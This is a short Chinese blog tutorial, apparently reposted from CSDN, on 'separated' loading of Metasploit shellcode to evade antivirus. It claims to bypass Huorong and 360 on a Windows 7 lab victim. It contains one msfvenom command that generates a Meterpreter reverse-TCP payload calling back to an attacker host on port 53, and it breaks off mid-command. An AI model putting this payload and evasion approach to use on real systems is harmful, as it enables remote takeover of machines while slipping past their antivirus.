msf shellcode分离免杀技术

目录

实验

实战演练


一般的shellcode是直接放在程序里面执行,分离免杀是将恶意代码放置在程序本身之外的一种加载方式。本实验轻松绕过最新版火rong和360

实验

实验环境

  • 受害机:win7(192.168.111.135)安装了最新版火绒360
  • 攻击机:kali  (192.168.111.132)

最新版火绒和360

1. ⾸先kali使⽤MSF⽣成⼀个shellcode,混淆后的:LPORT只能⽤53

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.111.132 LPORT=53 -b '\x00' -f c |grep -v unsigned|

猜你喜欢

转载自blog.csdn.net/qq_44159028/article/details/125008482
msf